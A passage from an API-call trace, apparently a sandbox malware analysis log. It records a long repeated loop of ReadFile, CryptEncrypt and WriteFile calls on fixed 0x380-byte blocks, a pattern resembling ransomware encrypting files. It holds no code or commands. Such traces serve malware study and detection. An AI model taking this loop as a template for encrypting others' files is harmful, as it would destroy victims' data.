(in: hKey=0x2fa408, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.233] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.233] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.233] CryptEncrypt (in: hKey=0x2fa408, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.233] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.233] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.233] CryptEncrypt (in: hKey=0x2fa408, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.234] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.234] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.234] CryptEncrypt (in: hKey=0x2fa408, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.234] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.234] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.234] CryptEncrypt (in: hKey=0x2fa408, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.234] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.234] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.234] CryptEncrypt (in: hKey=0x2fa408, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.234] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.234] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.235] CryptEncrypt (in: hKey=0x2fa408, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.235] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.235] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.235] CryptEncrypt (in: hKey=0x2fa408, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.235] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.235] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.235] CryptEncrypt (in: hKey=0x2fa408, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.235] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.235] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.235] CryptEncrypt (in: hKey=0x2fa408, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.235] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.235] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.235] CryptEncrypt (in: hKey=0x2fa408, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.236] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.236] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.236] CryptEncrypt (in: hKey=0x2fa408, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.236] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.236] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.236] CryptEncrypt (in: hKey=0x2fa408, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.236] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.236] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.236] CryptEncrypt (in: hKey=0x2fa408, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.236] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.236] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.236] CryptEncrypt (in: hKey=0x2fa408, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.236] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.237] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.237] CryptEncrypt (in: hKey=0x2fa408, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.237] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.237] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.237] CryptEncrypt (in: hKey=0x2fa408, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.237] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.237] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.237] CryptEncrypt (in: hKey=0x2fa408, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.237] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.237] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.237] CryptEncrypt (in: hKey=0x2fa408, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.237] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.237] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.238] CryptEncrypt (in: hKey=0x2fa408, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.238] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.238] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.238] CryptEncrypt (in: hKey=0x2fa408, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.238] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.238] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.238] CryptEncrypt (in: hKey=0x2fa408, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.238] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.238] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.238] CryptEncrypt (in: hKey=0x2fa408, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.238] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.238] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.238] CryptEncrypt (in: hKey=0x2fa408, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.238] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.239] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.239] CryptEncrypt (in: hKey=0x2fa408, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.239] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.239] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.239] CryptEncrypt (in: hKey=0x2fa408, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.239] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.239] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.239] CryptEncrypt (in: hKey=0x2fa408, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.239] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.239] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.239] CryptEncrypt (in: hKey=0x2fa408, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.239] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.239] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.239] CryptEncrypt (in: hKey=0x2fa408, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.240] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.240] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.240] CryptEncrypt (in: hKey=0x2fa408, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.240] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.240] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.240] CryptEncrypt (in: hKey=0x2fa408, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.240] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.240] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.240] CryptEncrypt (in: hKey=0x2fa408, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.240] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.240] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.240] CryptEncrypt (in: hKey=0x2fa408, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.240] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.241] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.241] CryptEncrypt (in: hKey=0x2fa408, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.241] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.241] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.241] CryptEncrypt (in: hKey=0x2fa408, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.241] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.241] 